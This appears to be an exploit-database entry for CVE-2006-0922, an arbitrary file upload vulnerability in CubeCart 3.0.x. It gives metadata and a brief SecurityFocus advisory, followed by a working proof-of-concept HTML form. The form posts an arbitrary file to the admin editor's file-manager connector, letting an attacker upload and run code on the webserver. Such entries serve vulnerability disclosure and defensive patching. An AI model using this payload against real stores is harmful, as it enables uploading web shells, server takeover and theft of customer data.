[] NeoSense

CubeCart 3.0.x - Arbitrary File Upload

Author: NSA Group
type: webapps
platform: php
port: 
date_added: 2006-02-23 
date_updated: 2013-08-03 
verified: 1 
codes: CVE-2006-0922;OSVDB-23624 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/16796/info

CubeCart is prone to an arbitrary file-upload vulnerability.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

<form action="http://www.example.com/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFol
der=/"
method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>